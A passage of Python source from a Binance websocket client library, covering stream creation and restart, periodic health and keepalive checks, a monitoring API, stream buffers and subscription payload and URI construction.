self.stream_buffers[stream_buffer_name] = deque(maxlen=stream_buffer_maxlen)
asyncio.set_event_loop(loop)
socket = BinanceWebSocketApiSocket(self, stream_id, channels, markets)
try:
loop.run_until_complete(socket.start_socket())
except RuntimeError as error_msg:
if "cannot schedule new futures after interpreter shutdown" in str(error_msg):
logging.critical(f"BinanceWebSocketApiManager._create_stream_thread() stream_id={str(stream_id)} "
f" - RuntimeError error_msg: - {str(error_msg)} - stopping and shutting down - read "
f"https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/issues/131"
f" for further information!")
self.stop_manager_with_all_streams()
sys.exit(1)
logging.critical(f"BinanceWebSocketApiManager._create_stream_thread() stream_id={str(stream_id)} "
f"error: 7 - {str(error_msg)} - if this stream did not restart after this error, please "
f"create an issue: "
f"https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/issues/new/choose")
loop.close()
finally:
self.process_stream_signals("DISCONNECT", stream_id)
loop.close()
def _frequent_checks(self):
"""
This method gets started as a thread and is doing the frequent checks
"""
frequent_checks_id = time.time()
cpu_usage_time = False
with self.frequent_checks_list_lock:
self.frequent_checks_list[frequent_checks_id] = {'last_heartbeat': 0,
'stop_request': None,
'has_stopped': False}
logging.info("BinanceWebSocketApiManager._frequent_checks() new instance created with frequent_checks_id=" +
str(frequent_checks_id))
# threaded loop for min 1 check per second
while self.stop_manager_request is None and self.frequent_checks_list[frequent_checks_id]['stop_request'] \
is None:
with self.frequent_checks_list_lock:
self.frequent_checks_list[frequent_checks_id]['last_heartbeat'] = time.time()
time.sleep(0.3)
current_timestamp = int(time.time())
last_timestamp = current_timestamp - 1
next_to_last_timestamp = current_timestamp - 2
total_most_stream_receives_last_timestamp = 0
total_most_stream_receives_next_to_last_timestamp = 0
active_stream_list = self.get_active_stream_list()
# check CPU stats
cpu = self.get_process_usage_cpu()
if cpu >= 95:
time_of_waiting = 5
if cpu_usage_time is False:
cpu_usage_time = time.time()
elif (time.time() - cpu_usage_time) > time_of_waiting:
logging.warning(f"BinanceWebSocketApiManager._frequent_checks() - High CPU usage since "
f"{str(time_of_waiting)} seconds: {str(cpu)}")
cpu_usage_time = False
else:
cpu_usage_time = False
# count most_receives_per_second total last second
if active_stream_list:
for stream_id in active_stream_list:
# set the streams `most_receives_per_second` value
try:
if self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp] > \
self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second']:
self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second'] = \
self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp]
except KeyError:
pass
try:
total_most_stream_receives_last_timestamp += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp]
except KeyError:
pass
try:
total_most_stream_receives_next_to_last_timestamp += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][next_to_last_timestamp]
except KeyError:
pass
# delete list entries older than `keep_max_received_last_second_entries`
# receives_statistic_last_second
delete_index = []
if len(self.stream_list[stream_id]['receives_statistic_last_second']['entries']) > \
self.keep_max_received_last_second_entries:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
temp_entries = copy.deepcopy(self.stream_list[stream_id]['receives_statistic_last_second']['entries'])
for timestamp_key in temp_entries:
try:
if timestamp_key < current_timestamp - self.keep_max_received_last_second_entries:
delete_index.append(timestamp_key)
except ValueError as error_msg:
logging.error(
"BinanceWebSocketApiManager._frequent_checks() timestamp_key=" + str(timestamp_key) +
" current_timestamp=" + str(current_timestamp) + " keep_max_received_last_second_"
"entries=" + str(self.keep_max_received_last_second_entries) + " error_msg=" +
str(error_msg))
for timestamp_key in delete_index:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
self.stream_list[stream_id]['receives_statistic_last_second']['entries'].pop(timestamp_key,
None)
# transfer_rate_per_second
delete_index = []
if len(self.stream_list[stream_id]['transfer_rate_per_second']['bytes']) > \
self.keep_max_received_last_second_entries:
try:
temp_bytes = self.stream_list[stream_id]['transfer_rate_per_second']['bytes']
for timestamp_key in temp_bytes:
try:
if timestamp_key < current_timestamp - self.keep_max_received_last_second_entries:
delete_index.append(timestamp_key)
except ValueError as error_msg:
logging.error(
"BinanceWebSocketApiManager._frequent_checks() timestamp_key="
+ str(timestamp_key) +
" current_timestamp=" + str(current_timestamp) +
" keep_max_received_last_second_"
"entries=" + str(self.keep_max_received_last_second_entries) + " error_msg=" +
str(error_msg))
except RuntimeError as error_msg:
logging.info("BinanceWebSocketApiManager._frequent_checks() - "
"Catched RuntimeError: " + str(error_msg))
for timestamp_key in delete_index:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'].pop(timestamp_key, None)
# set most_receives_per_second
try:
if int(self.most_receives_per_second) < int(total_most_stream_receives_last_timestamp):
self.most_receives_per_second = int(total_most_stream_receives_last_timestamp)
except ValueError as error_msg:
logging.error("BinanceWebSocketApiManager._frequent_checks() self.most_receives_per_second"
"=" + str(self.most_receives_per_second) + " total_most_stream_receives_last_timestamp"
"=" + str(total_most_stream_receives_last_timestamp) + " total_most_stream_receives_next_"
"to_last_timestamp=" + str(total_most_stream_receives_next_to_last_timestamp) + " error_"
"msg=" + str(error_msg))
# check receiving_speed_peak
last_second_receiving_speed = self.get_current_receiving_speed_global()
try:
if last_second_receiving_speed > self.receiving_speed_peak['value']:
self.receiving_speed_peak['value'] = last_second_receiving_speed
self.receiving_speed_peak['timestamp'] = time.time()
logging.info(f"BinanceWebSocketApiManager._frequent_checks() - reached new "
f"`highest_receiving_speed` "
f"{str(self.get_human_bytesize(self.receiving_speed_peak['value'], '/s'))} at "
f"{self.get_date_of_timestamp(self.receiving_speed_peak['timestamp'])}")
except TypeError as error_msg:
pass
# send keepalive for `!userData` streams every 30 minutes
if active_stream_list:
for stream_id in active_stream_list:
if isinstance(active_stream_list[stream_id]['markets'], str):
active_stream_list[stream_id]['markets'] = [active_stream_list[stream_id]['markets'], ]
if isinstance(active_stream_list[stream_id]['channels'], str):
active_stream_list[stream_id]['channels'] = [active_stream_list[stream_id]['channels'], ]
if "!userData" in active_stream_list[stream_id]['markets'] or \
"!userData" in active_stream_list[stream_id]['channels']:
if (active_stream_list[stream_id]['start_time'] + active_stream_list[stream_id]['listen_key_cache_time']) \
< time.time() and (active_stream_list[stream_id]['last_static_ping_listen_key'] +
active_stream_list[stream_id]['listen_key_cache_time']) < time.time():
# keep-alive the listenKey
self.restclient.keepalive_listen_key(stream_id)
# set last_static_ping_listen_key
self.stream_list[stream_id]['last_static_ping_listen_key'] = time.time()
self.set_heartbeat(stream_id)
logging.info("BinanceWebSocketApiManager._frequent_checks() - sent listen_key keepalive "
"ping for stream_id=" + str(stream_id))
sys.exit(0)
def _keepalive_streams(self):
"""
This method is started as a thread and is observing the streams, if neccessary it restarts a dead stream
"""
keepalive_streams_id = time.time()
self.keepalive_streams_list[keepalive_streams_id] = {'last_heartbeat': 0,
'stop_request': None,
'has_stopped': False}
logging.info(
"BinanceWebSocketApiManager._keepalive_streams() new instance created with keepalive_streams_id=" +
str(keepalive_streams_id))
# threaded loop to restart crashed streams:
while self.stop_manager_request is None and \
self.keepalive_streams_list[keepalive_streams_id]['stop_request'] is None:
time.sleep(1)
self.keepalive_streams_list[keepalive_streams_id]['last_heartbeat'] = time.time()
# restart streams with a restart_request (status == new)
temp_restart_requests = copy.deepcopy(self.restart_requests)
for stream_id in temp_restart_requests:
try:
# find restarts that didnt work
if self.restart_requests[stream_id]['status'] == "restarted" and \
self.restart_requests[stream_id]['last_restart_time']+self.restart_timeout < time.time():
self.restart_requests[stream_id]['status'] = "new"
# restart streams with requests
if self.restart_requests[stream_id]['status'] == "new" or \
self.stream_list[stream_id]['kill_request'] is True:
self.kill_stream(stream_id)
thread = threading.Thread(target=self._restart_stream_thread, args=(stream_id,))
thread.start()
except KeyError:
pass
sys.exit(0)
def _restart_stream(self, stream_id):
"""
This is NOT stop/start! Its purpose is to start a died stream again! Use `set_restart_request()` for stop/start!
:param stream_id: id of a stream
:type stream_id: uuid
:return: stream_id or False
"""
try:
if self.restart_requests[stream_id]['status'] != "new":
logging.warning("BinanceWebSocketApiManager._restart_stream() please use `set_restart_request()` "
"instead!")
return False
except KeyError:
# no restart_request entry for this stream_id:
logging.warning("BinanceWebSocketApiManager._restart_stream() please use `set_restart_request() instead!")
return False
logging.info("BinanceWebSocketApiManager._restart_stream(" + str(stream_id) + ", " +
str(self.stream_list[stream_id]['channels']) +
", " + str(self.stream_list[stream_id]['markets']) + ")")
self.restart_requests[stream_id] = {'status': "restarted"}
self.restart_requests[stream_id]['last_restart_time'] = time.time()
self.stream_list[stream_id]['status'] = "restarting"
self.stream_list[stream_id]['kill_request'] = None
self.stream_list[stream_id]['payload'] = []
try:
loop = asyncio.new_event_loop()
except OSError as error_msg:
logging.critical(f"BinanceWebSocketApiManager.create_stream({str(stream_id)}) - OSError - "
f"error_msg: {str(error_msg)}")
return False
self.event_loops[stream_id] = loop
thread = threading.Thread(target=self._create_stream_thread,
args=(loop,
stream_id,
self.stream_list[stream_id]['channels'],
self.stream_list[stream_id]['markets'],
self.stream_list[stream_id]['stream_buffer_name'],
self.stream_list[stream_id]['stream_buffer_maxlen'],
True))
thread.start()
return stream_id
def _restart_stream_thread(self, stream_id):
"""
Wait till the old socket has closed and then start it again
:param stream_id: id of a stream
:type stream_id: uuid
"""
self._restart_stream(stream_id)
def _start_monitoring_api_thread(self, host, port, warn_on_update):
"""
Threaded method that servces the monitoring api
:param host: IP or hostname to use
:type host: str
:param port: Port to use
:type port: int
:param warn_on_update: Should the monitoring system report available updates?
:type warn_on_update: bool
"""
logging.info("BinanceWebSocketApiManager._start_monitoring_api_thread() - Starting monitoring API service ...")
app = Flask(__name__)
@app.route('/')
@app.route('/status/')
def redirect_to_wiki():
logging.info("BinanceWebSocketApiManager._start_monitoring_api_thread() 200 - "
"Visit https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/UNICORN-"
"Monitoring-API-Service for further information!")
return redirect("https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/"
"UNICORN-Monitoring-API-Service", code=302)
api = Api(app)
api.add_resource(BinanceWebSocketApiRestServer,
"/status/<string:statusformat>/",
"/status/<string:statusformat>/<string:checkcommandversion>",
resource_class_kwargs={'handler_binance_websocket_api_manager': self,
'warn_on_update': warn_on_update})
try:
dispatcher = wsgi.PathInfoDispatcher({'/': app})
self.monitoring_api_server = wsgi.WSGIServer((host, port), dispatcher)
self.monitoring_api_server.start()
except RuntimeError as error_msg:
logging.critical("BinanceWebSocketApiManager._start_monitoring_api_thread() - Monitoring API service is "
"going down! - Info: " + str(error_msg))
except OSError as error_msg:
logging.critical("BinanceWebSocketApiManager._start_monitoring_api_thread() - Monitoring API service is "
"going down! - Info: " + str(error_msg))
def add_to_ringbuffer_error(self, error):
"""
Add received error messages from websocket endpoints to the error ringbuffer
:param error: The data to add.
:type error: string
:return: bool
"""
while len(self.ringbuffer_error) >= self.get_ringbuffer_error_max_size():
self.ringbuffer_error.pop(0)
self.ringbuffer_error.append(str(error))
return True
def add_to_ringbuffer_result(self, result):
"""
Add received result messages from websocket endpoints to the result ringbuffer
:param result: The data to add.
:type result: string
:return: bool
"""
while len(self.ringbuffer_result) >= self.get_ringbuffer_result_max_size():
self.ringbuffer_result.pop(0)
self.ringbuffer_result.append(str(result))
return True
def add_to_stream_buffer(self, stream_data, stream_buffer_name=False):
"""
Kick back data to the
`stream_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
If it is not possible to process received stream data (for example, the database is restarting, so its not
possible to save the data), you can return the data back into the stream_buffer. After a few seconds you stopped
writing data back to the stream_buffer, the BinanceWebSocketApiManager starts flushing back the data to normal
processing.
:param stream_data: the data you want to write back to the buffer
:type stream_data: raw stream_data or unicorn_fied stream data
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:return: bool
"""
if stream_buffer_name is False:
with self.stream_buffer_lock:
self.stream_buffer.append(stream_data)
else:
with self.stream_buffer_locks[stream_buffer_name]:
self.stream_buffers[stream_buffer_name].append(stream_data)
self.last_entry_added_to_stream_buffer = time.time()
return True
def add_to_stream_signal_buffer(self, signal_type=False, stream_id=False, data_record=False):
"""
Add signals about a stream to the
`stream_signal_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
:param signal_type: "CONNECT", "DISCONNECT" or "FIRST_RECEIVED_DATA"
:type signal_type: str
:param stream_id: id of a stream
:type stream_id: uuid
:param data_record: The last or first received data record
:type data_record: str or dict
:return: bool
"""
if self.enable_stream_signal_buffer:
stream_signal = {'type': signal_type,
'stream_id': stream_id,
'timestamp': time.time()}
if signal_type == "CONNECT":
# nothing to add ...
pass
elif signal_type == "DISCONNECT":
try:
stream_signal['last_received_data_record'] = self.stream_list[stream_id]['last_received_data_record']
except KeyError as error_msg:
logging.critical(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({signal_type}) - "
f"Cant determine last_received_data_record! - error_msg: {error_msg}")
stream_signal['last_received_data_record'] = None
elif signal_type == "FIRST_RECEIVED_DATA":
stream_signal['first_received_data_record'] = data_record
else:
logging.error(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({signal_type}) - "
f"Received invalid `signal_type`!")
return False
with self.stream_signal_buffer_lock:
self.stream_signal_buffer.append(stream_signal)
logging.info(f"BinanceWebSocketApiManager.add_to_stream_signal_buffer({stream_signal})")
return True
else:
return False
def add_total_received_bytes(self, size):
"""
Add received bytes to the total received bytes statistic
:param size: int value of added bytes
:type size: int
"""
with self.total_received_bytes_lock:
self.total_received_bytes += int(size)
def clear_stream_buffer(self, stream_buffer_name=False):
"""
Clear the
`stream_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
:param stream_buffer_name: `False` to read from generic stream_buffer, the stream_id if you used True in
create_stream() or the string name of a shared stream_buffer.
:type stream_buffer_name: bool or str
:return: bool
"""
if stream_buffer_name is False:
try:
self.stream_buffer.clear()
return True
except IndexError:
return False
else:
try:
with self.stream_buffer_locks[stream_buffer_name]:
self.stream_buffers[stream_buffer_name].clear()
return True
except IndexError:
return False
except KeyError:
return False
def create_payload(self, stream_id, method, channels=False, markets=False):
"""
Create the payload for subscriptions
:param stream_id: provide a stream_id
:type stream_id: uuid
:param method: `SUBSCRIBE` or `UNSUBSCRIBE`
:type method: str
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:return: payload (list) or False
"""
logging.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", " + str(channels) + ", " +
str(markets) + ") started ...")
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
payload = []
if self.is_exchange_type("dex"):
if method == "subscribe" and channels is not False:
for channel in channels:
add_payload = {"method": method,
"topic": channel}
symbols = []
if channel == "allMiniTickers" or \
channel == "allTickers" or \
channel == "blockheight":
add_payload["symbols"] = ["$all"]
payload.append(add_payload)
continue
if markets:
for market in markets:
if market == "allMiniTickers" or \
market == "allTickers" or \
market == "blockheight":
add_payload_from_market = {"method": method,
"topic": market,
"symbols": ["$all"]}
payload.append(add_payload_from_market)
continue
elif re.match(r'[a-zA-Z0-9]{41,43}', market) is not None:
if self.stream_list[stream_id]['dex_user_address'] is False:
self.stream_list[stream_id]['dex_user_address'] = market
else:
symbols.append(market)
try:
if self.stream_list[stream_id]["dex_user_address"] is not False:
add_payload["address"] = self.stream_list[stream_id]["dex_user_address"]
payload.append(add_payload)
except KeyError:
pass
if len(symbols) > 0:
add_payload["symbols"] = symbols
payload.append(add_payload)
elif method == "unsubscribe":
if markets:
add_payload = {"method": method}
for market in markets:
if re.match(r'[a-zA-Z0-9]{41,43}', market) is not None:
if self.stream_list[stream_id]['dex_user_address'] is False:
self.stream_list[stream_id]['dex_user_address'] = market
markets.remove(market)
if len(markets) > 0:
add_payload["symbols"] = markets
payload.append(add_payload)
if channels:
for channel in channels:
add_payload = {"method": method,
"topic": channel}
payload.append(add_payload)
else:
logging.critical("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
+ str(channels) + ", " + str(markets) + ") - Allowed values for `method`: `subscribe` "
"or `unsubscribe`!")
return False
elif self.is_exchange_type("cex"):
final_market = "@arr"
if markets:
for market in markets:
if "arr@" in market:
final_market = "@" + market
final_channel = "@arr"
if channels:
for channel in channels:
if "arr@" in channel:
final_channel = "@" + channel
if method == "subscribe":
params = []
for channel in channels:
if "!" in channel:
params.append(channel + final_market)
continue
else:
for market in markets:
if "!" in market:
params.append(market + final_channel)
else:
params.append(market.lower() + "@" + channel)
if len(params) > 0:
params = list(set(params))
payload = self.split_payload(params, "SUBSCRIBE")
elif method == "unsubscribe":
if markets:
params = []
try:
for channel in self.stream_list[stream_id]['channels']:
if "!" in channel:
params.append(channel + final_market)
else:
for market in markets:
params.append(market.lower() + "@" + channel)
if len(params) > 0:
payload = self.split_payload(params, "UNSUBSCRIBE")
except KeyError:
pass
if channels:
params = []
for market in self.stream_list[stream_id]['markets']:
if "!" in market:
params.append(market + final_channel)
else:
for channel in channels:
params.append(market.lower() + "@" + channel)
if len(params) > 0:
payload = self.split_payload(params, "UNSUBSCRIBE")
else:
logging.critical("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
+ str(channels) + ", " + str(markets) + ") - Allowed values for `method`: `subscribe` "
"or `unsubscribe`!")
return False
logging.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", "
+ str(channels) + ", " + str(markets) + ") - Payload: " + str(payload))
logging.info("BinanceWebSocketApiManager.create_payload(" + str(stream_id) + ", " + str(channels) + ", " +
str(markets) + ") finished ...")
return payload
def create_stream(self,
channels,
markets,
stream_label=None,
stream_buffer_name=False,
api_key=False,
api_secret=False,
symbols=False,
output=False,
ping_interval=20,
ping_timeout=20,
close_timeout=10,
stream_buffer_maxlen=None):
"""
Create a websocket stream
If you provide 2 markets and 2 channels, then you are going to create 4 subscriptions (markets * channels).
Example:
channels = ['trade', 'kline_1']
markets = ['bnbbtc', 'ethbtc']
Finally: bnbbtc@trade, ethbtc@trade, bnbbtc@kline_1, ethbtc@kline_1
`There is a subscriptions limit per stream!
<https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/Binance-websocket-endpoint-configuration-overview>`_
Create `!userData` streams as single streams, because its using a different endpoint and can not get combined
with other streams in a multiplexed stream!
Example CEX:
``binance_websocket_api_manager.create_stream(["arr"], ["!userData"], api_key="aaa", api_secret="bbb")``
Isolated Margin:
``binance_websocket_api_manager.create_stream(["arr"], ["!userData"], api_key="aaa", api_secret="bbb", symbols="ankrbtc")``
Example DEX:
``binance_websocket_api_manager.create_stream(['orders', 'transfers', 'accounts'], binance_dex_user_address)``
To create a multiplexed stream which includes also `!miniTicker@arr`, `!ticker@arr`, `!forceOrder@arr` or
`!bookTicker@arr` you just need to add `!bookTicker` to the channels list - dont add `arr` (cex) or `$all`
(dex) to the markets list.
Example:
``binance_websocket_api_manager.create_stream(['kline_5m', 'marketDepth', '!miniTicker'], ['bnbbtc'])``
But you have to add `arr` or `$all` if you want to start it as a single stream!
Example:
``binance_websocket_api_manager.create_stream(["arr"], ["!miniTicker"])``
:param channels: provide the channels you wish to stream
:type channels: str, tuple, list, set
:param markets: provide the markets you wish to stream
:type markets: str, tuple, list, set
:param stream_label: provide a stream_label to identify the stream
:type stream_label: str
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:param output: the default setting `raw_data` can be globaly overwritten with the parameter
`output_default <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html?highlight=output_default#module-unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager>`_
of BinanceWebSocketApiManager`. To overrule the `output_default` value for this specific stream,
set `output` to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise with
the default setting "raw_data" the output remains unchanged and gets delivered as received from
the endpoints
:type output: str
:param ping_interval: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type ping_interval: int or None
:param ping_timeout: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type ping_timeout: int or None
:param close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection. (default: 10)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type close_timeout: int or None
:param stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non generic
`stream_buffer`. The generic `stream_buffer` uses always the value of
`BinanceWebSocketApiManager()`.
:type stream_buffer_maxlen: int or None
:return: stream_id or 'False'
"""
# create a stream
if isinstance(channels, bool):
logging.error(f"BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets) + ", "
+ str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ", " +
str(stream_buffer_maxlen) + ") - Parameter "
f"`channels` must be str, tuple, list or a set!")
return False
elif isinstance(markets, bool):
if isinstance(channels, bool):
logging.error(f"BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets) + ", "
+ str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ", " +
str(stream_buffer_maxlen) + ") - Parameter "
f"`markets` must be str, tuple, list or a set!")
return False
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if output is False:
output = self.output_default
stream_id = uuid.uuid4()
markets_new = []
if stream_buffer_name is True:
stream_buffer_name = stream_id
for market in markets:
if "!" in market \
or market == "allMiniTickers" \
or market == "allTickers" \
or market == "blockheight" \
or market == "$all":
markets_new.append(market)
else:
if self.is_exchange_type('dex'):
if re.match(r'[a-zA-Z0-9]{41,43}', market) is None:
markets_new.append(str(market).upper())
else:
markets_new.append(str(market))
elif self.is_exchange_type('cex'):
markets_new.append(str(market).lower())
logging.info("BinanceWebSocketApiManager.create_stream(" + str(channels) + ", " + str(markets_new) + ", "
+ str(stream_label) + ", " + str(stream_buffer_name) + ", " + str(symbols) + ") with stream_id="
+ str(stream_id))
self._add_stream_to_stream_list(stream_id,
channels,
markets_new,
stream_label,
stream_buffer_name,
symbols=symbols,
api_key=api_key,
api_secret=api_secret,
output=output,
ping_interval=ping_interval,
ping_timeout=ping_timeout,
close_timeout=close_timeout,
stream_buffer_maxlen=stream_buffer_maxlen)
try:
loop = asyncio.new_event_loop()
except OSError as error_msg:
logging.critical(f"BinanceWebSocketApiManager.create_stream({str(channels)}, {str(markets_new)}, "
f"{str(stream_label)}, {str(stream_buffer_name)}, {str(symbols)}), {stream_buffer_maxlen} "
f"with stream_id="
f"{str(stream_id)} - OSError - can not create stream - error_msg: {str(error_msg)}")
return False
self.event_loops[stream_id] = loop
thread = threading.Thread(target=self._create_stream_thread, args=(loop,
stream_id,
channels,
markets_new,
stream_buffer_name,
stream_buffer_maxlen,
False))
thread.start()
return stream_id
def create_websocket_uri(self, channels, markets, stream_id=False, api_key=False, api_secret=False, symbols=False):
"""
Create a websocket URI
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_id: provide a stream_id (only needed for userData Streams (acquiring a listenKey)
:type stream_id: uuid
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:return: str or False
"""
if isinstance(channels, bool):
logging.error(f"BinanceWebSocketApiManager.create_websocket_uri({str(channels)}, {str(markets)}"
f", {str(symbols)}) - error_msg: Parameter `channels` must be str, tuple, list "
f"or a set!")
return False
elif isinstance(markets, bool):
logging.error(f"BinanceWebSocketApiManager.create_websocket_uri({str(channels)}, {str(markets)}"
f", {str(symbols)}) - error_msg: Parameter `markets` must be str, tuple, list "
f"or a set!")
return False
payload = []
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if len(channels) == 1 and len(markets) == 1:
if "!userData" in channels or "!userData" in markets:
if stream_id is not False:
response = self.get_listen_key_from_restclient(stream_id, api_key, api_secret, symbols=symbols)
try:
if response['code'] == -1102 or \
response['code'] == -2008 or \
response['code'] == -2014 or \
response['code'] == -2015 or \
response['code'] == -11001:
# -1102 = Mandatory parameter 'symbol' was not sent, was empty/null, or malformed.
# -2008 = Invalid Api-Key ID
# -2014 = API-key format invalid
# -2015 = Invalid API-key, IP, or permissions for action
# -11001 = Isolated margin account does not exist.
logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + ", " + str(symbols) + ") - Received known "
"error code from rest client: " + str(response))
return response
else:
logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + ", " + str(symbols) + ") - Received unknown "
"error code from rest client: " + str(response))
return response
except KeyError:
pass
except TypeError:
pass
if response:
try:
uri = self.websocket_base_uri + "ws/" + str(response['listenKey'])
uri_hidden_secret = self.websocket_base_uri + "ws/" + self.replaced_secrets_text
if self.show_secrets_in_logs is True:
logging.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + str(symbols) + ") - result: " + uri)
else:
logging.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + str(symbols) + ") - result: " +
uri_hidden_secret)
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return uri
except KeyError:
logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", "
+ str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not "
"create URI!!")
return False
except TypeError:
logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", "
+ str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not "
"create URI!!")
return False
else:
logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not create "
"URI!!")
return False
else:
logging.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not create URI!!")
return False
elif "!bookTicker" in channels or "!bookTicker" in markets:
if stream_id:
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/!bookTicker"
elif "arr" in channels or "$all" in markets:
if stream_id:
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/" + markets[0] + "@" + channels[0]
elif "arr" in markets or "$all" in channels:
if stream_id:
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/" + channels[0] + "@" + markets[0]
elif self.is_exchange_type("dex"):
if re.match(r'[a-zA-Z0-9]{41,43}', markets[0]) is not None:
try:
if self.stream_list[stream_id]['dex_user_address'] is False:
self.stream_list[stream_id]['dex_user_address'] = markets[0]
if self.stream_list[stream_id]['dex_user_address'] != markets[0]:
logging.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Error: once set, the "
"dex_user_address is not allowed to get changed anymore!")
return False
except KeyError:
pass
add_payload = {"method": "subscribe",
"topic": channels[0],
"address": markets[0]}
payload.append(add_payload)
if stream_id:
self.stream_list[stream_id]['payload'] = payload
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/" + markets[0]
elif markets[0] != "" and channels[0] != "":
return self.websocket_base_uri + "ws/" + markets[0] + "@" + channels[0]
else:
logging.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Error: not able to create websocket "
"URI for DEX")
return False
if self.is_exchange_type("dex"):
query = "ws"
if stream_id:
payload = self.create_payload(stream_id, "subscribe", channels=channels, markets=markets)
self.stream_list[stream_id]['payload'] = payload
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + str(query)
else:
query = "stream?streams="
final_market = "@arr"
market = ""
channel = ""
for market in markets:
if "arr@" in market:
final_market = "@" + market
final_channel = "@arr"
for channel in channels:
if "arr@" in channel:
final_channel = "@" + channel
for channel in channels:
if channel == "!userData":
logging.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
